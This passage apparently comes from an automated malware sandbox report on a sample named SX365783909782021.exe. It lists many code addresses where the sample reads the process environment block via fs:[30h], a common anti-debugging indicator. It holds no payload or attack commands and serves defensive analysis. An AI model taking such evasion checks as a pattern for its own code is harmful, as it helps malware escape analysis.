          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BFA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BCB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BCB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BCB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BE4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BCB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BCB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BCC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BDAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BDAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BFFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C54257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C8EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BE3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BCAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BCAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C98A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BC5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BD8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C0927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C723E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C723E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C723E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BFB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C95BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BEA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BCDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BCF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BCDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C98CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00BD849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exe | Code function: 2_2_00C814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C84496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BE746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BDD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C03D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C43540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00C73D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SX365783909782021.exeCode function: 2_2_00BD3D34 mov eax, dword ptr fs:[00000030h]
